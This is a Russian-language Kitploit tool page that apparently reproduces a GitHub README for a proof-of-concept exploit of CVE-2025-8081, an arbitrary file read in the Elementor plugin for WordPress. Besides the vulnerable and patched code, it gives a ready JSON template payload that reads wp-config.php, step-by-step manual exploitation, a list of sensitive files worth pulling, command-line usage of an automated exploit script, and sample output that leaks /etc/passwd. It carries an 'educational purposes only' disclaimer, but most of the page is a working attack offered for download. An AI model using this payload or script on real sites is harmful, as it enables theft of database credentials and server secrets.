Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8081-Elementor — Эксплойт proof-of-concept для CVE-2025-8081 — произвольное чтение файлов в плагине Elementor для WordPress, позволяющее аутентифицированным администраторам читать конфиденциальные файлы, такие как wp-config.php. | Kitploit
Инструменты/GitHubGitHub/lyesh4ck/cve-2025-8081-elementor
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHublyesh4ck/cve-2025-8081-elementor

CVE-2025-8081-Elementor

Эксплойт proof-of-concept для CVE-2025-8081 — произвольное чтение файлов в плагине Elementor для WordPress, позволяющее аутентифицированным администраторам читать конфиденциальные файлы, такие как wp-config.php.

Репозиторий
11 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-8081 — Уязвимость произвольного чтения файлов в Elementor

Severity CVSS WordPress Elementor

Критическая уязвимость произвольного чтения файлов в плагине Elementor для WordPress, которая позволяет аутентифицированным администраторам читать любые файлы, доступные веб-серверу, включая конфиденциальные файлы конфигурации, содержащие учётные данные базы данных.


📋 Обзор уязвимости

Информация о CVE

СвойствоЗначение
ID CVECVE-2025-8081
ТипПроизвольное чтение файлов (CWE-22: Path Traversal)
Оценка CVSS4.9 (Средний) — Реальное влияние: КРИТИЧЕСКОЕ
Вектор CVSSAV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Затронутые версииElementor ≤ 3.30.2
Исправленная версияElementor ≥ 3.30.3
Дата выпуска22 июля 2025 г.
Дата раскрытия15 октября 2025 г.

Требования для атаки

  • ✅ Учётная запись администратора WordPress
  • ✅ Установленный и активированный плагин Elementor
  • ✅ Доступ к функциональности импорта шаблонов
  • ✅ Включённый виджет Image Elementor

Влияние

  • 🔴 Произвольное чтение файлов: чтение любого файла, доступного пользователю веб-сервера (www-data)
  • 🔴 Кража учётных данных: доступ к wp-config.php раскрывает учётные данные базы данных и ключи безопасности
  • 🔴 Компрометация базы данных: полный доступ к базе данных WordPress с использованием украденных учётных данных

🎯 Детали уязвимости

Местоположение

Уязвимость существует в одном файле в одной строке:

root@kitploit:~
elementor/includes/template-library/classes/class-import-images.php
Строка 115 (v3.28.3)

Уязвимый код (v3.28.3)

root@kitploit:~
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = Utils::file_get_contents( $attachment['tmp_name'] );  // ❌ NO VALIDATION!
}

Проблема: параметр tmp_name НЕ проверяется с помощью is_uploaded_file(), что позволяет атакующему указать произвольные пути к файлам.

Исправленный код (v3.30.3)

root@kitploit:~
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = false;
    // security validation in case the tmp_name has been tampered with
    if ( is_uploaded_file( $attachment['tmp_name'] ) ) {  // ✅ VALIDATION ADDED!
        $file_content = Utils::file_get_contents( $attachment['tmp_name'] );
    }
}

Исправление: патч добавляет проверку is_uploaded_file(), чтобы гарантировать, что tmp_name ссылается на легитимный файл, загруженный через HTTP POST.


💣 Доказательство концепции

JSON-полезная нагрузка

root@kitploit:~
{
  "content": [{
    "id": "s1",
    "elType": "section",
    "settings": [],
    "elements": [{
      "id": "c1",
      "elType": "column",
      "settings": {"_column_size": 100},
      "elements": [{
        "id": "w1",
        "elType": "widget",
        "widgetType": "image",
        "settings": {
          "image": {
            "url": "http://x.com/x.jpg",
            "id": 1,
            "tmp_name": "/var/www/html/wp-config.php",
            "name": "leaked_config.txt"
          }
        },
        "elements": []
      }]
    }]
  }],
  "version": "0.4",
  "type": "page"
}

Шаги ручной эксплуатации

  1. Войдите в WordPress как администратор
  2. Перейдите в Elementor → Мои шаблоны → Импорт шаблонов
  3. Загрузите JSON-полезную нагрузку выше (сохраните как payload.json)
  4. Нажмите Импортировать сейчас
  5. Перейдите в Медиафайлы → Библиотека
  6. Найдите и скачайте leaked_config.txt

Результат: содержимое wp-config.php с учётными данными базы данных раскрыто!


📊 Интересные файлы для выгрузки

Критические файлы

ФайлОписаниеВлияние
/var/www/html/wp-config.phpКонфигурация WordPress🔴 КРИТИЧЕСКОЕ — учётные данные БД
/proc/self/environПеременные окружения🔴 КРИТИЧЕСКОЕ — ключи API, секреты

Файлы высокой ценности

ФайлОписаниеВлияние
/etc/passwdПользователи системы🟠 ВЫСОКОЕ — перечисление пользователей
/var/www/html/.htaccessКонфигурация веб-сервера🟠 ВЫСОКОЕ — раскрытие конфигурации
/var/log/apache2/access.logЖурналы Apache🟡 СРЕДНЕЕ — раскрытие информации

🛠️ Автоматизированная эксплуатация

Быстрый старт

root@kitploit:~
python3 exploit.py -t https://target.com -u admin -p password123

Параметры командной строки

root@kitploit:~
Обязательные аргументы:
  -t, --target URL        URL целевого WordPress (например, https://target.com)
  -u, --user USERNAME     Имя пользователя администратора WordPress
  -p, --password PASS     Пароль администратора WordPress

Необязательные аргументы:
  -f, --file PATH         Файл для чтения (по умолчанию: /var/www/html/wp-config.php)
  -o, --output FILE       Имя выходного файла (по умолчанию: автоматически генерируется)
  --insecure, -k          Отключить проверку SSL-сертификата
  -v, --verbose           Включить подробный вывод для отладки
  -h, --help              Показать справочное сообщение

Примеры использования

root@kitploit:~
# Базовая эксплуатация (читает wp-config.php с полезной нагрузкой по умолчанию)
python3 exploit.py -t http://target.com -u admin -p password123

# Пользовательский целевой файл
python3 exploit.py -t http://target.com -u admin -p password123 -f /etc/passwd

# С HTTPS и самоподписанным сертификатом
python3 exploit.py -t https://target.com -u admin -p password123 --insecure

# Подробный режим с пользовательским выводом
python3 exploit.py -t http://target.com -u admin -p password123 \
  -f /etc/passwd -o users.txt -v

# Из OrbStack/Docker с нацеливанием на хост-машину
python3 exploit.py -t http://host.internal:8080 -u admin -p password123 -v

Ожидаемый вывод

root@kitploit:~
Kali:~$ python3 exploit.py  -t http://host.internal:8080 -u admin -p admin123 -f /etc/passwd

======================================================================
 CVE-2025-8081 - Elementor Arbitrary File Read
======================================================================
Target: http://host.internal:8080
File:   /etc/passwd
======================================================================

[INFO] Attempting WordPress authentication...
[SUCCESS] ✓ Authentication successful!
[INFO] Fetching AJAX nonce...
[INFO] Loading payload: payload.json
[INFO] Uploading malicious template...
[SUCCESS] ✓ Template uploaded successfully!
[INFO] Searching for leaked file: leaked_passwd.txt
[SUCCESS] ✓ Found file: http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
[INFO] Downloading file...
[SUCCESS] ✓ Downloaded 839 bytes

======================================================================
 EXPLOITATION SUCCESSFUL!
======================================================================
File URL:  http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
File size: 839 bytes
Saved to:  leaked_passwd.txt

--- FILE CONTENT (first 500 chars) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin
--- END ---
======================================================================

⚖️ Правовое уведомление

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ

Этот инструмент предоставляется только для исследований в области безопасности и целей тестирования на проникновение. Использование этого инструмента для атак на цели без предварительного взаимного согласия незаконно.

Ответственность за соблюдение всех применимых местных, государственных и федеральных законов лежит на конечном пользователе.

  • ✅ Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение
  • ✅ Практика ответственного раскрытия информации
  • ✅ Образовательные и исследовательские цели
  • ❌ Несанкционированный доступ незаконен и наказуем по закону
  • ❌ Автор не несёт ответственности за неправомерное использование

Используя этот инструмент, вы соглашаетесь использовать его законно и этично.


Последнее обновление: 17 октября 2025 г.

Скачать инструмент